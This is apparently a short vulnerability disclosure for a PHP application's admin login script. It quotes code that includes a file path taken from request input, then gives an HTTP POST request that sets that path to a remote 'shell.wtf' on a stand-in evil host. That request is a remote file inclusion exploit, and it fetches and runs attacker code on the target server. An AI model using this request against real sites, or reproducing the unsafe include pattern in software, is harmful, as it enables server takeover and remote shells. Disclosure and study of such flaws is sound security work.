if($var_url['exe']=='login') { $var_form['login_user'] = (string) $_POST['form_field_user']; $var_form['login_password'] = (string) $_POST['form_field_password']; if( !empty($var_form['login_user']) && !empty($var_form['login_password']) ) { include($_PATH['shadow.php']); /*...*/
POST http://[host]/[path]/admin/includes/index_login.php HTTP/1.0 Content-type: application/x-www-form-urlencoded var_url[exe]=login&form_field_user=1&form_field_password=1&_PATH[shadow.php]=http://[evil_host]/shell.wtf